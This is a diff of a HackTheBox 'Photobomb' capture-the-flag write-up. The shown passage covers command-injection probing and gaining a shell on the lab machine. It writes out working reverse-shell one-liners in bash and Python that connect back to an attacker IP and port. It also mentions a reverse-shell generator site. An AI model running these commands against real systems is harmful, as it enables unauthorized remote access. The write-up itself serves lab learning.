n0sys/HackTheBox-WriteUp/HackTheBox-Photobomb/README.md

 [Wed Feb  1 13:29:17 2023] 10.10.11.182:57208 [404]: GET /.jpg - No such file or directory
 [Wed Feb  1 13:29:17 2023] 10.10.11.182:57208 Closing
 ```
-Amazing, lets try to get some info out of it before attempting to spawn a reverse shell
+Amazing, lets try to get some info out of this before attempting to spawn a reverse shell

 ```
 [Wed Feb  1 13:45:31 2023] 10.10.11.182:59600 [404]: GET /?wizard - No such file or directory
 [Wed Feb  1 13:46:07 2023] 10.10.11.182:35262 [404]: GET /?/home/wizard/photobomb - No such file or directory
 ```
 We can attempt know and spawn a reverse shell.
-To do that we use [Reverse Shells Generator](https://www.revshells.com/).
+To do that, we use [Reverse Shells Generator](https://www.revshells.com/).
 We tried at first to spawn a shell with bash but it was unsuccessful.
-So we tried to use python and it worked!
-We have access now to the machine.
 ```bash
 $ sh -i >& /dev/tcp/10.10.14.112/8000 0>&1
 ```
+So we tried to use python which is usually installed on linux machines and it worked!
 ```python
 $ export RHOST="10.10.14.112";export RPORT=8000;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
 ```
-whoami
+We have shell access now to the machine.
 ```bash
 $ whoami
 wizzard